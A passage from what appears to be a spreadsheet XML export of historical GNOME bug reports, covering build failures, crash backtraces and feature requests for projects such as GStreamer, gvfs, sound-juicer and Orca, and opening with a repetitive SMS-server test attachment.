BILENUMBER%%This is a test for %%MOBILENUMBER%%107%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%207%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%34%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%45%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%108%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%208%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%35%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%46%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%109%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%209%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%36%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%47%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%110%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%210%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%37%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%48%%MOBILENUMBER%%This is !
a test for %%MOBILENUMBER%%111%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%
100290537-1122HTTP SMS SERVER122%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%23%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%24%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%25%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%26%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%100%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%200%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%27%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%38%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%101%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%201%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%28%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%39%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%102%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%202%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%29%%MOBILENUMBER%%This is a test for %%MOBI!
LENUMBER%%40%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%103%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%203%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%30%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%41%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%104%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%204%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%31%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%42%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%105%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%205%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%32%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%43%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%106%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%206%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%33%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%44%%M!
OBILENUMBER%%This is a test for %%MOBILENUMBER%%107%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%207%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%34%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%45%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%108%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%208%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%35%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%46%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%109%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%209%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%36%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%47%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%110%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%210%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%37%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%48%%MOBILENUMBER%%This is!
 a test for %%MOBILENUMBER%%111%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%
100290537-1122HTTP SMS SERVER122%%MOBILENUMBER%%This is a test
100290537-1122HTTP SMS SERVER1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
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
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
100290537-1122HTTP SMS SERVER1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
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22447740203253This is a test
100290537-1122HTTP SMS SERVER122447740203253This is a test
200290537-11TEST33CBF94E7A2CBCCA5C849C41638EADAA1D2E02B6107C8583
TCPAddress=195.147.13.104
TCPPort=2970
--- End of file ---
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-07-20 06:59 -------
The original reporter (aknox@saturn.levelfour.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component chema@celorio.com.
</t>
  </si>
  <si>
    <t>aknox</t>
  </si>
  <si>
    <t>GEDIT-328013</t>
  </si>
  <si>
    <t>Add GNOME and/or GTK categories o the .desktop file</t>
  </si>
  <si>
    <t>The .desktop file should have GNOMEGTK or GTK in it's Categories according to the standard:
  http://standards.freedesktop.org/menu-spec/latest/apa.html</t>
  </si>
  <si>
    <t>LAST-EXIT-409970</t>
  </si>
  <si>
    <t>Allow linking against external NDesk.DBus</t>
  </si>
  <si>
    <t>Hi
please commit the attached patch or something similar to allow linking against external NDesk.DBus and NDesk.DBus.GLib.
Bye</t>
  </si>
  <si>
    <t>GLIB-338046</t>
  </si>
  <si>
    <t>threadpool-test.c failed on RH9</t>
  </si>
  <si>
    <t>glib-2.10.2 compiled under RH9
gcc 3.2.2 glibc glibc 2.3.2
make check got the following error
...
PASS: thread-test
** ERROR **: file threadpool-test.c: line 124 (test_thread_stop_unused): assertion failed: (test_count_threads () == limit)
aborting...</t>
  </si>
  <si>
    <t>kcc1967</t>
  </si>
  <si>
    <t>GAZPACHO-170317</t>
  </si>
  <si>
    <t>Toplevel widgets cannot be deleted anymore</t>
  </si>
  <si>
    <t>It's not possible to delete toplevel widgets anymore.
Error:
Traceback (most recent call last):
  File /home/enki/src/gazpacho/gazpacho/application.py line 714 in _delete_cb
    self._project.delete_selection()
  File /home/enki/src/gazpacho/gazpacho/project.py line 278 in delete_selection
    self._app.command_manager.delete(gwidget)
  File /home/enki/src/gazpacho/gazpacho/command.py line 71 in delete
    cmd.execute()
  File /home/enki/src/gazpacho/gazpacho/command.py line 374 in execute
    retval = self._delete_execute()
  File /home/enki/src/gazpacho/gazpacho/command.py line 362 in _delete_execute
    self._parent.set_default_gtk_packing_properties(self._placeholder
AttributeError: 'NoneType' object has no attribute
'set_default_gtk_packing_properties'</t>
  </si>
  <si>
    <t>SOUND-JUICER-330285</t>
  </si>
  <si>
    <t>Contains duplicated code from GStreamer</t>
  </si>
  <si>
    <t>I tried to compile sound-juicer HEAD but the build failed with the following error:
elin:/opt/gnome-2-14/src/sound-juicer/src &gt; make
make  all-am
make[1]: Entering directory `/opt/gnome-2-14/src/sound-juicer/src'
if gcc -DHAVE_CONFIG_H -I. -I. -I.  -DGNOMELOCALEDIR=\/opt/gnome/share/locale\ -DDATADIR=\/opt/gnome/share\ -DPREFIX=\/opt/gnome\ -DLIBDIR=\/opt/gnome/lib\ -DSYSCONFDIR=\/opt/gnome/etc\ -DPIXMAPDIR=\/opt/gnome/share/pixmaps\ -DPKGDATADIR=\/opt/gnome/share/sound-juicer\ -I/opt/gnome/include   -pthread -I/opt/gnome/include/gstreamer-0.10 -I/opt/gnome/include/glib-2.0 -I/opt/gnome/lib/glib-2.0/include -I/opt/gnome/include/libxml2 -DORBIT2=1 -pthread -I/opt/gnome/include/gnome-media -I/opt/gnome/include/gconf/2 -I/opt/gnome/include/gtk-2.0 -I/opt/gnome/include/libglade-2.0 -I/opt/gnome/include/libgnome-2.0 -I/opt/gnome/include/orbit-2.0 -I/opt/gnome/include/glib-2.0 -I/opt/gnome/lib/glib-2.0/include -I/opt/gnome/lib/gtk-2.0/include -I/opt/gnome/include/atk-1.0 -I/opt/gnome/include/cairo -I/opt/gnome/include/pango-1.0 -I/opt/gnome/include/libxml2 -I/opt/gnome/include/libbonobo-2.0 -I/opt/gnome/include/gnome-vfs-2.0 -I/opt/gnome/lib/gnome-vfs-2.0/include -I/opt/gnome/include/bonobo-activation-2.0   -I/opt/gnome/include/libnautilus-burn -I/opt/gnome/include/glib-2.0 -I/opt/gnome/lib/glib-2.0/include -I/opt/gnome/include/gtk-2.0 -I/opt/gnome/lib/gtk-2.0/include -I/opt/gnome/include/atk-1.0 -I/opt/gnome/include/cairo -I/opt/gnome/include/pango-1.0   -DORBIT2=1 -pthread -I/opt/gnome/include/gtk-2.0 -I/opt/gnome/lib/gtk-2.0/include -I/opt/gnome/include/atk-1.0 -I/opt/gnome/include/cairo -I/opt/gnome/include/pango-1.0 -I/opt/gnome/include/glib-2.0 -I/opt/gnome/lib/glib-2.0/include -I/opt/gnome/include/libglade-2.0 -I/opt/gnome/include/libxml2 -I/opt/gnome/include/gconf/2 -I/opt/gnome/include/orbit-2.0 -I/opt/gnome/include/libgnomeui-2.0 -I/opt/gnome/include/libgnome-2.0 -I/opt/gnome/include/libgnomecanvas-2.0 -I/opt/gnome/include/libart-2.0 -I/opt/gnome/include/libbonoboui-2.0 -I/opt/gnome/include/gnome-vfs-2.0 -I/opt/gnome/lib/gnome-vfs-2.0/include -I/opt/gnome/include/gnome-keyring-1 -I/opt/gnome/include/libbonobo-2.0 -I/opt/gnome/include/bonobo-activation-2.0 -I/opt/gnome/include -I/usr/include/freetype2 -I/opt/gnome/include/gnome-vfs-module-2.0    -Wall -export-dynamic -W -Wno-unused-parameter -g -O2 -MT sj-extractor.o -MD -MP -MF .deps/sj-extractor.Tpo -c -o sj-extractor.o sj-extractor.c \
        then mv -f .deps/sj-extractor.Tpo .deps/sj-extractor.Po else rm -f .deps/sj-extractor.Tpo exit 1 fi
sj-extractor.c:213: error: static declaration of â€˜gst_bin_find_unconnected_padâ€™ follows non-static declaration
/opt/gnome/include/gstreamer-0.10/gst/gstutils.h:571: error: previous declaration of â€˜gst_bin_find_unconnected_padâ€™ was here
make[1]: *** [sj-extractor.o] Error 1
make[1]: Leaving directory `/opt/gnome-2-14/src/sound-juicer/src'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>GSTREAMER-368536</t>
  </si>
  <si>
    <t>bin_change_state makes children go through unnecessary state changes</t>
  </si>
  <si>
    <t>I noticed that in a bin when doing a change_state lets say from PLAYING to NULL  
change_state is called of course and it changes the children state to the next state in the transition namely here PAUSE  
but the problem is it does this without checking the children current state if the children was in state NULL for example there's no reason to bring it to PAUSED to go to NULL after .. 
This could cause problems when for exemple the change state of the element to PAUSE would fail and then it would make the pipeline state change form PLAYING to NULL fail also  even if there's no reason to fail here...
So here's a patch to check the children state and to skip all children state changes that are not in the same direction as the bin state changes (bin changes downward  children changes downwards only too). Also if the children state is already at the bin's pending state it will skip the transition since it's not needed either...
Note that I still set the base_time even if I skip the transition just to be sure... I was unsure about this.. ? feel free to comment
Also I could commit this myself ( and would like too ) :) .. just tell me if you guys approuve the patch or if it needs changes...
(Tested with my regression  I could not see any problems)</t>
  </si>
  <si>
    <t>GNOME-MEDIA-516090</t>
  </si>
  <si>
    <t>Port to gio</t>
  </si>
  <si>
    <t>Gnome-media has gnome-vfs in grecord and the audio profiles dialog.
I'm taking a whack to switch them over to gio (and by the looks of it to the new recent manager stuff as a consequence...).</t>
  </si>
  <si>
    <t>zuh</t>
  </si>
  <si>
    <t>GTK+-485437</t>
  </si>
  <si>
    <t>Fix testxinerama.c to not query current monitor by default</t>
  </si>
  <si>
    <t>Currently testxinerama.c is querying current monitor setup at configure event time which is causing it to override info from all monitors with current monitor one for each window opened by testcase.
Attached patch fixes this behaviour by adding a button query current monitor and keeping info from all monitors by default.</t>
  </si>
  <si>
    <t>GSTREAMER-125539</t>
  </si>
  <si>
    <t>Problem installing gstreamer 0.7.1</t>
  </si>
  <si>
    <t>Hi
I got a little problem with the make install :
[...]
Making install in docs
gmake[1]: Entering directory `/tmp/gstreamer-0.7.1/docs'
Making install in faq
gmake[2]: Entering directory `/tmp/gstreamer-0.7.1/docs/faq'
gmake[3]: Entering directory `/tmp/gstreamer-0.7.1/docs/faq'
gmake[3]: Nothing to be done for `install-exec-am'.
mkdir -p /usr/local/share/doc/gstreamer-0.7.1/faq
cp -pr  /usr/local/share/doc/gstreamer-0.7.1/faq
cp: missing destination file
Try `cp --help' for more information.
gmake[3]: *** [install-data-local] Error 1
gmake[3]: Leaving directory `/tmp/gstreamer-0.7.1/docs/faq'
gmake[2]: *** [install-am] Error 2
gmake[2]: Leaving directory `/tmp/gstreamer-0.7.1/docs/faq'
gmake[1]: *** [install-recursive] Error 1
gmake[1]: Leaving directory `/tmp/gstreamer-0.7.1/docs'
gmake: *** [install-recursive] Error 1</t>
  </si>
  <si>
    <t>LIBSIGC++-105729</t>
  </si>
  <si>
    <t>signals</t>
  </si>
  <si>
    <t>signal#::connect() should return an iterator</t>
  </si>
  <si>
    <t>As discussed on the ml signal#::connect() should return an iterator for
convenience.</t>
  </si>
  <si>
    <t>MHL.Schulze</t>
  </si>
  <si>
    <t>GVFS-521889</t>
  </si>
  <si>
    <t>webdav backend</t>
  </si>
  <si>
    <t>when copying a file to webdav://  cancelling the copy doesn't actually cancel it</t>
  </si>
  <si>
    <t>Please describe the problem:
When copying a file to a webdav:// share a progress dialog appears with a cancel button. Clicking the cancel button closes the dialog and makes everything look like the copy action was indeed cancelled but actually the file is still being transferred. Refreshing the view shows that the file still grows (until the whole file is transferred).
Steps to reproduce:
1. go to a remote webdav:// share preferably over a slow connection
2. copy a large file (large enough so it will take many seconds to transfer) from your local disk to the share
3. when the progress dialog comes up click on the Cancel button to the right of the progress bar
4. notice that the progress dialog closes
Actual results:
When refreshing the folder list (with F5) the half-copied file can be seen when periodically refreshing the view it can be seen that the file size grows. Also the network connection is still being used.
Expected results:
The file should stay at (roughly) the size it had when cancelling the transfer. The transfer should stop nearly immediately so the connection is no longer used and no further disk space is consumed on the remote system.
Does this happen every time?
Yes.
Other information:
This was seen in Ubuntu Hardy Alpha with gvfs 0.2.0.1-0ubuntu1 .
A minor (maybe related) irk is that the progress bar itself is at 100% right from the start instead of actually showing progress.</t>
  </si>
  <si>
    <t>oliver.gerlich</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-527881</t>
  </si>
  <si>
    <t>crash with NULL metacity theme</t>
  </si>
  <si>
    <t>Version: 2.22.0
What were you doing when the application crashed?
Distribution: Fedora release 8.93 (Rawhide)
Gnome Release: 2.22.1 2008-04-10 (Red Hat Inc)
BugBuddy Version: 2.22.0
System: Linux 2.6.25-0.218.rc8.git7.fc9.i686 #1 SMP Wed Apr 9 20:35:56 EDT 2008 i686
X Vendor: The X.Org Foundation
X Vendor Release: 10499901
Selinux: Enforcing
Accessibility: Disabled
GTK+ Theme: Clearlooks_Cairo-Olive
Icon Theme: Fedora
Memory status: size: 48627712 vsize: 48627712 resident: 12963840 share: 8142848 rss: 12963840 rss_rlim: 4294967295
CPU usage: start_time: 1208100586 rtime: 32 utime: 28 stime: 4 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/gnome-appearance-properties'
(no debugging symbols found)
Using host libthread_db library /lib/libthread_db.so.1.
Getting all the debuginfos: debuginfo-install control-center
[Thread debugging using libthread_db enabled]
[New Thread -1207752912 (LWP 3980)]
0x00110416 in __kernel_vsyscall ()
#0  0x00110416 in __kernel_vsyscall ()
#1  0x0072eb43 in __waitpid_nocancel () from /lib/libpthread.so.0
#2  0x00a399e7 in IA__g_spawn_sync (working_directory=0x0 argv=0x8840d90 
    envp=0x0 flags= child_setup=0 user_data=0x0 
    standard_output=0x0 standard_error=0x0 exit_status=0x0 error=0x87bb288)
    at gspawn.c:374
#3  0x00a39d2c in IA__g_spawn_command_line_sync (
    command_line=0x88bf428 bug-buddy --appname=\gnome-appearance-properties\ --pid=3980 standard_output=0x0 standard_error=0x0 exit_status=0x0 
    error=0x87bb288) at gspawn.c:682
#4  0x00124253 in ?? () from /usr/lib/gtk-2.0/modules/libgnomebreakpad.so
#5  0x001247d8 in ?? () from /usr/lib/gtk-2.0/modules/libgnomebreakpad.so
#6  0x00124893 in google_breakpad::ExceptionHandler::InternalWriteMinidump ()
   from /usr/lib/gtk-2.0/modules/libgnomebreakpad.so
#7  0x00124e23 in google_breakpad::ExceptionHandler::HandleException ()
   from /usr/lib/gtk-2.0/modules/libgnomebreakpad.so
#8  
#9  theme_get_style (theme=0x0 type=META_FRAME_TYPE_NORMAL flags=3199)
    at ui/theme.c:4947
#10 0x05f80776 in meta_preview_get_clip_region (preview=0x8806110 
    new_window_width=128 new_window_height=128) at ui/preview-widget.c:481
#11 0x080711bd in message_from_capplet ()
#12 0x00a373ed in g_io_unix_dispatch (source=0x87bca80 
    callback=0x8070180  user_data=0xbfe68234)
    at giounix.c:162
#13 0x009f7790 in g_main_dispatch (context=0x87bb268) at gmain.c:2009
#14 0x009f97cd in g_main_context_iterate (context=0x0 block=1 dispatch=1 
    self=0x8799458) at gmain.c:2561
#15 0x009f9c7a in IA__g_main_loop_run (loop=0x87bca70) at gmain.c:2850
#16 0x056ca8f9 in IA__gtk_main () at gtkmain.c:1163
#17 0x0806e462 in theme_thumbnail_factory_init ()
#18 0x08058a69 in main ()
Thread 1 (Thread -1207752912 (LWP 3980)):
#0  0x00110416 in __kernel_vsyscall ()
No symbol table info available.
#1  0x0072eb43 in __waitpid_nocancel () from /lib/libpthread.so.0
No symbol table info available.
#2  0x00a399e7 in IA__g_spawn_sync (working_directory=0x0 argv=0x8840d90 
    envp=0x0 flags= child_setup=0 user_data=0x0 
    standard_output=0x0 standard_error=0x0 exit_status=0x0 error=0x87bb288)
    at gspawn.c:374
	outpipe = -1
	errpipe = -1
	pid = 3983
	fds = {__fds_bits = {11178532 0 142871964 142324232 10590933 
    142563472 10479440 0 24975676 134217728 0 16134132 15505652 318 
    142324168 0 10 1184717 -1 16134132 1662964 144252492 0 142871952 
    3 142563472 0 142582600 143636016 16132864 15137728 10207796}}
	ret = 
	outstr = (GString *) 0x0
	errstr = (GString *) 0x0
	failed = 0
	status = 
	__PRETTY_FUNCTION__ = IA__g_spawn_sync
#3  0x00a39d2c in IA__g_spawn_command_line_sync (
    command_line=0x88bf428 bug-buddy --appname=\gnome-appearance-properties\ --pid=3980 standard_output=0x0 standard_error=0x0 exit_status=0x0 
    error=0x87bb288) at gspawn.c:682
	retval = 0
	argv = (gchar **) 0x8840d90
	__PRETTY_FUNCTION__ = IA__g_spawn_command_line_sync
#4  0x00124253 in ?? () from /usr/lib/gtk-2.0/modules/libgnomebreakpad.so
No symbol table info available.
#5  0x001247d8 in ?? () from /usr/lib/gtk-2.0/modules/libgnomebreakpad.so
No symbol table info available.
#6  0x00124893 in google_breakpad::ExceptionHandler::InternalWriteMinidump ()
   from /usr/lib/gtk-2.0/modules/libgnomebreakpad.so
No symbol table info available.
#7  0x00124e23 in google_breakpad::ExceptionHandler::HandleException ()
   from /usr/lib/gtk-2.0/modules/libgnomebreakpad.so
No symbol table info available.
#8  
No symbol table info available.
#9  theme_get_style (theme=0x0 type=META_FRAME_TYPE_NORMAL flags=3199)
    at ui/theme.c:4947
	state = 
	resize = 
	style = 
	style_set = 
	__PRETTY_FUNCTION__ = theme_get_style
#10 0x05f80776 in meta_preview_get_clip_region (preview=0x8806110 
    new_window_width=128 new_window_height=128) at ui/preview-widget.c:481
	xrect = {x = 0 y = 1072693248 width = 0 height = 142583232}
	corners_xregion = (GdkRegion *) 0x8849900
	window_xregion = 
	fgeom = (MetaFrameLayout *) 0x30
	frame_style = (MetaFrameStyle *) 0x0
	__PRETTY_FUNCTION__ = meta_preview_get_clip_region
#11 0x080711bd in message_from_capplet ()
No symbol table info available.
#12 0x00a373ed in g_io_unix_dispatch (source=0x87bca80 
    callback=0x8070180  user_data=0xbfe68234)
    at giounix.c:162
	buffer_condition = 0
#13 0x009f7790 in g_main_dispatch (context=0x87bb268) at gmain.c:2009
	dispatch = (gboolean (*)(GSource * GSourceFunc 
    gpointer)) 0xa373a0 
	user_data = (gpointer) 0xbfe68234
	callback = (GSourceFunc) 0x8070180 
	cb_funcs = (GSourceCallbackFuncs *) 0xaa951c
	cb_data = (gpointer) 0x87bcac8
	current_source_link = {data = 0x87bca80 next = 0x0}
	source = (GSource *) 0x87bca80
	current = (GMainDispatch *) 0x879ad08
	i = 0
	__PRETTY_FUNCTION__ = g_main_dispatch
#14 0x009f97cd in g_main_context_iterate (context=0x0 block=1 dispatch=1 
    self=0x8799458) at gmain.c:2561
	got_ownership = 
	max_priority = 2147483647
	timeout = -1
	some_ready = 1
	nfds = 7505792
	allocated_nfds = 3
	fds = (GPollFD *) 0x87bcae0
	__PRETTY_FUNCTION__ = g_main_context_iterate
#15 0x009f9c7a in IA__g_main_loop_run (loop=0x87bca70) at gmain.c:2850
	got_ownership = 
	self = (GThread *) 0x8799458
	__PRETTY_FUNCTION__ = IA__g_main_loop_run
#16 0x056ca8f9 in IA__gtk_main () at gtkmain.c:1163
	tmp_list = (GList *) 0x0
	functions = (GList *) 0x0
	init = (GtkInitFunction *) 0xbfe68258
	loop = (GMainLoop *) 0x87bca70
#17 0x0806e462 in theme_thumbnail_factory_init ()
No symbol table info available.
#18 0x08058a69 in main ()
No symbol table info available.
#0  0x00110416 in __kernel_vsyscall ()
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]
----------- .xsession-errors (688036 sec old) ---------------------
Try: yum --enablerepo='*-debuginfo' install /usr/lib/debug/.build-id/31/92fb4e270238a31d8d1028c5f24cf521443024.debug
Missing separate debuginfo for /lib/libbz2.so.1
Try: yum --enablerepo='*-debuginfo' install /usr/lib/debug/.build-id/80/11758bd3229c55767a0137a492d46668975d12.debug
Missing separate debuginfo for /lib/libnss_mdns4_minimal.so.2
Try: yum --enablerepo='*-debuginfo' install /usr/lib/debug/.build-id/0b/5b83c1640f179ba2f2b26e15ae3d1f5041f626.debug
Missing separate debuginfo for /lib/libnss_dns.so.2
Try: yum --enablerepo='*-debuginfo' install /usr/lib/debug/.build-id/60/d3c54a1d8ca83f7f9659ab84481a268f586ac4.debug
** Message: Could not connect to power manager: Could not get owner of name 'org.freedesktop.PowerManagement': no such name
** Message: Could not connect to power manager: Could not get owner of name 'org.freedesktop.PowerManagement': no such name
** Message: Could not connect to power manager: Could not get owner of name 'org.freedesktop.PowerManagement': no such name
gnome-session: Fatal IO error 11 (Die Ressource ist zur Zeit nicht verfÃ¼gbar) on X server :0.0.
DBus connection has been lost trackerd will now shutdown
Fenstermanager-Warnung:Schwerwiegender E/A-Fehler 11 (Die Ressource ist zur Zeit nicht verfÃ¼gbar) auf Anzeige Â»:0.0Â«.
pam-panel-icon: Fatal IO error 11 (Die Ressource ist zur Zeit nicht verfÃ¼gbar) on X server :0.0.
nm-applet: Fatal IO error 11 (Die Ressource ist zur Zeit nicht verfÃ¼gbar) on X server :0.0.
--------------------------------------------------</t>
  </si>
  <si>
    <t>rruhland</t>
  </si>
  <si>
    <t>GNOME-CORE-30995</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-core
Severity: normal
Version:  1.2.1
Synopsis: startup crash
Class:    sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.14-5.0 i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.2
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.1
Description:
crashes during starting of startx
Debugging information:
0x405288e9 in __wait4 () from /lib/libc.so.6
#0  0x405288e9 in __wait4 () from /lib/libc.so.6
#1  0x405871ec in ?? () from /lib/libc.so.6
#2  0x40085131 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0x404b5c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x403bd36d in g_free () from /usr/lib/libglib-1.2.so.0
#5  0x80537ae in free_list ()
#6  0x403c54f9 in g_slist_foreach () from /usr/lib/libglib-1.2.so.0
#7  0x80537f4 in splash_cleanup ()
#8  0x401c822d in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#9  0x401f59bd in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#10 0x401f4e02 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#11 0x401f2f05 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#12 0x401d8b53 in gtk_object_shutdown () from /usr/lib/libgtk-1.2.so.0
#13 0x4022bd50 in gtk_widget_shutdown () from /usr/lib/libgtk-1.2.so.0
#14 0x4022e5e3 in gtk_window_shutdown () from /usr/lib/libgtk-1.2.so.0
#15 0x401d8afb in gtk_object_destroy () from /usr/lib/libgtk-1.2.so.0
#16 0x40224d46 in gtk_widget_destroy () from /usr/lib/libgtk-1.2.so.0
#17 0x805373c in destroy_dialog ()
#18 0x401c7df9 in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#19 0x401f59bd in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#20 0x401f4e02 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#21 0x401f2f05 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#22 0x4022831c in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#23 0x401c7d52 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#24 0x401c6faa in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#25 0x4027153b in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#26 0x403bc186 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#27 0x403bc751 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#28 0x403bc8f1 in g_main_run () from /usr/lib/libglib-1.2.so.0
#29 0x401c68e9 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#30 0x80502d8 in main ()
#31 0x404af9cb in __libc_start_main (main=0x8050140  argc=1 
    argv=0xbffffac4 init=0x804c6e4  fini=0x8056d6c  
    rtld_fini=0x4000ae60  stack_end=0xbffffabc)
    at ../sysdeps/generic/libc-start.c:92
#0  0x405288e9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405871ec in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x40085131 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x404b5c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x403bd36d in g_free () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#5  0x80537ae in free_list ()
No symbol table info available.
#6  0x403c54f9 in g_slist_foreach () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#7  0x80537f4 in splash_cleanup ()
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 15:07 -------
This bug was previously known as bug 30995 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=30995
Originally filed under the gnome-core product and general component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (tslusher@roanoke.edu) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>tslusher</t>
  </si>
  <si>
    <t>YELP-381529</t>
  </si>
  <si>
    <t>All parts of the UI should accept a dragged document</t>
  </si>
  <si>
    <t>When I drag a DocBook file from Nautilus only the document pane reacts to it. The contents pane the toolbar and menu do nothing.
All of the UI should react to a dropped document by opening it.</t>
  </si>
  <si>
    <t>GNUMERIC-128565</t>
  </si>
  <si>
    <t>Old .gnumeric cell comments not imported</t>
  </si>
  <si>
    <t>1.2.1 cell comments are 
1.2.2 cell comments are 
1.2.2 does not read 1.2.1's cell comments.</t>
  </si>
  <si>
    <t>PAN-339531</t>
  </si>
  <si>
    <t>Multi-part yEnc images display only first part</t>
  </si>
  <si>
    <t>Please describe the problem:
For multi-part yEnc messages containing JPEG images the image viewer displays
only the image data contained within the first part.  The rest of the image
displays corrupted data---either solid black or artifacts from the previously
viewed image.  If you save the attachment it is downloaded correctly.  This is
just a viewing problem.
Steps to reproduce:
1. Download a multi-part yEnc message containing a JPEG image.
2. Look at the image in the body pane.
Actual results:
Only that part of the image contained in the first message will be displayed
the rest will be corrupted showing artifacts from the previously displayed image.
Expected results:
The entire image should appear correctly.
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>itsr0y</t>
  </si>
  <si>
    <t>ORCA-338690</t>
  </si>
  <si>
    <t>orca_i18n doesn't work as expected.</t>
  </si>
  <si>
    <t>From the orca-list@gnome.org mailing list:
I am trying to make i18n work in Orca I have correct the locale LANGUAGE=es_ES_UTF8 and the orca.mo is generated in compile/installation step. But when I run Orca it plays in english instead of spanish. 
From python I have tried from orca_i18n import _ And then _(Welcome to Orca) for example and it returns the same string. I have tried with other strings and the same occured.</t>
  </si>
  <si>
    <t>VTE-99698</t>
  </si>
  <si>
    <t>--std=c99 breaks gcc 2.95</t>
  </si>
  <si>
    <t>When trying to build the version of vte from a cvs checkout on 27th nov I
couldn't build it due to what I believe is a gcc 3.x specific option.
namely --std=c99 which doesn't work with the latest version of the gcc
package in debian unstable (2.95.4-17) -17 being the debian versioning
